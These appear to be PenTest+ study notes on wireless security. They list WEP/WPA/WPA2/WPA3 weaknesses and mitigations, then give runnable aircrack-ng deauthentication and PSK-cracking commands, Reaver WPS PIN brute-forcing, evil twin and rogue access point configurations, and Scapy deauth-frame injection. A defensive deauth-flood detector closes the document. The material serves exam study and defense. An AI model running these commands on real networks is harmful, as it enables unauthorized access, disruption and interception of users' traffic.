Wireless Security
Encryption Types
- WEP (Wired Equivalent Privacy): RC4 cipher with 40‑ or 128‑bit key; weak 24‑bit IV → trivial to crack
- WPA (Wi‑Fi Protected Access): TKIP + RC4 + MIC; fixes the WEP IV problem but TKIP has its own weaknesses → upgrade to WPA2
- WPA2: AES‑CCMP; supports Personal (PSK) & Enterprise (RADIUS) modes; strong, but PSK dictionary attacks are possible
- WPA3: SAE (Dragonfly) key exchange, forward secrecy, 192‑bit enterprise mode; currently no known practical attacks
Look into the Diffie‑Hellman key exchange protocol to understand why WPA3's SAE protocol is so secure
Common Vulnerabilities & Mitigations
- WEP: crack IVs via passive capture; mitigation: disable WEP, use WPA2/3
- WPA: vulnerable TKIP; mitigation: disable TKIP, use WPA2/3
- WPA2: PSK guessable; mitigation: strong passphrases or move to WPA3
- WPS: 8‑digit PIN brute‑force; mitigation: disable WPS
- MAC Filtering: trivial to bypass by MAC spoofing; mitigation: use encryption + 802.1X
Wireless Signal Exploitation
Signal Jamming
- Overwhelm channel with noise → disrupt comms; often illegal; avoid in production
Wardriving
- Map Wi‑Fi footprints by driving with scanning tools
- Tools:
- WiGLE.net: global Wi‑Fi map & analytics
- inSSIDer: real‑time scan (SSID, BSSID, channel, security)
- Ethical Use: only collect metadata, no unauthorized access
Aircrack‑ng Suite
Purpose: capture & crack WEP/WPA PSK handshakes
Deauthentication Attack
1. **Monitor mode**:
```bash
airmon-ng start wlan0
```
2. **Scan**:
```bash
airodump-ng wlan0mon
```
3. **Capture** (target BSSID AA:BB:CC:DD:EE:FF on CH 6):
```bash
airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --write capture wlan0mon
```
4. **Deauth** (send 10 frames):
```bash
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
```
5. **Crack PSK** (wordlist attack):
```bash
aircrack-ng -w /path/to/wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
```
---
## WPS PIN Attacks (Reaver)
```bash
# Start monitor mode
airmon-ng start wlan0
# Identify APs with WPS enabled
wash -i wlan0mon
# Brute‑force the WPS PIN
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Recover the WPA PSK from an already‑known PIN
bully -b <mac> -p <pin> wlan0mon
```
Output: displays the cracked PIN and WPA PSK once found
Captive Portal Attacks
Evil Twin + Rogue AP using hostapd & dnsmasq
```conf
# hostapd.conf snippet (hostapd's key is ssid, not essid)
driver=nl80211
interface=wlan0mon
ssid=Free_WiFi
channel=6
```
```conf
# dnsmasq.conf snippet
interface=wlan0mon
dhcp-range=10.0.0.50,10.0.0.150,12h
address=/#/10.0.0.1
```
- `address=/#/10.0.0.1` resolves every DNS name to 10.0.0.1 → all clients land on the captive portal
Evil Twin Attack
```bash
# Create rogue AP
airbase-ng -e "Hotel_WiFi" -c 11 wlan0mon
# wifipumpkin3: rogue‑AP framework with a Metasploit‑style console
wifipumpkin3
```
Use mitmproxy or SSLstrip to intercept HTTP(S) sessions.
Kismet
Passive discovery for Wi‑Fi, Bluetooth, Zigbee
```bash
# Start Kismet server
kismet -c wlan0mon --log-prefix=kismet-log --insecure
```
- Detects hidden SSIDs during client handshakes
- Logs pcap for later analysis with Wireshark
Wi‑Fi Protocol Fuzzing
- Technique used to identify vulnerabilities in Wi‑Fi implementations by sending random or unexpected data and observing how the devices respond
Scapy: craft malformed 802.11 frames; observe the responses in Wireshark
```python
from scapy.all import *
# Deauthentication frame carrying an out‑of‑spec reason code
deauth_frame = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="00:11:22:33:44:55", addr3="00:11:22:33:44:55") / Dot11Deauth(reason=99)
sendp(deauth_frame, iface="wlan0", count=10, inter=0.1)
# Beacon advertising an unexpected SSID
beacon_frame = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="00:11:22:33:44:55", addr3="00:11:22:33:44:55") / Dot11Beacon(cap="ESS+privacy") / Dot11Elt(ID="SSID", info="Unexpected_SSID")
sendp(beacon_frame, iface="wlan0", count=10, inter=0.1)
```
- Observe crashes or misbehavior → potential driver/firmware bug
https://www.DionTraining.com CompTIA PenTest+ (PT0-003) (Study Guide), p. 309
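Defender‑side counterpart to the aireplay‑ng deauthentication step and the Scapy deauth frames above: an added example, not from the study guide, that parses raw 802.11 management frames (as a Kismet or Wireshark pcap would hold them, RadioTap header already stripped) and flags a deauth/disassoc flood per sender. The sample frames, MAC addresses, window and threshold are constructed assumptions.

```python
import struct
from collections import defaultdict

def _mgmt(subtype, dst, src, bssid, body):
    """Build a minimal 802.11 management frame (type 0) with the given subtype."""
    fc = bytes([(subtype << 4) | 0x00, 0x00])          # frame control: type 0, flags 0
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

# Constructed sample traffic: one beacon, then a burst of broadcast deauths (reason 99)
BCAST = bytes.fromhex("ffffffffffff")
AP = bytes.fromhex("001122334455")
SAMPLE = [(0.0, _mgmt(8, BCAST, AP, AP, b"\x00" * 12))] + [
    (i * 0.1, _mgmt(12, BCAST, AP, AP, struct.pack("<H", 99))) for i in range(10)
]

def parse_frame(raw):
    """Return (type, subtype, addr1, addr2, reason) for a raw 802.11 frame, else None."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    a1, a2 = raw[4:10].hex(":"), raw[10:16].hex(":")
    reason = None
    if ftype == 0 and subtype in (10, 12) and len(raw) >= 26:   # disassoc / deauth
        reason = struct.unpack("<H", raw[24:26])[0]
    return ftype, subtype, a1, a2, reason

def detect_deauth_flood(frames, window=1.0, threshold=5):
    """Alert once per sender that emits >= threshold deauth/disassoc frames within `window` seconds.
    Unauthenticated deauths are only possible without 802.11w (PMF), which WPA3 makes mandatory."""
    recent = defaultdict(list)
    alerts = {}
    for ts, raw in frames:
        p = parse_frame(raw)
        if p is None or p[0] != 0 or p[1] not in (10, 12):
            continue
        src = p[3]
        recent[src] = [t for t in recent[src] if ts - t <= window] + [ts]
        if len(recent[src]) >= threshold and src not in alerts:
            alerts[src] = {"count": len(recent[src]),
                           "broadcast": p[2] == "ff:ff:ff:ff:ff:ff",   # broadcast deauth = strong signal
                           "reason": p[4]}
    return alerts

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE))
```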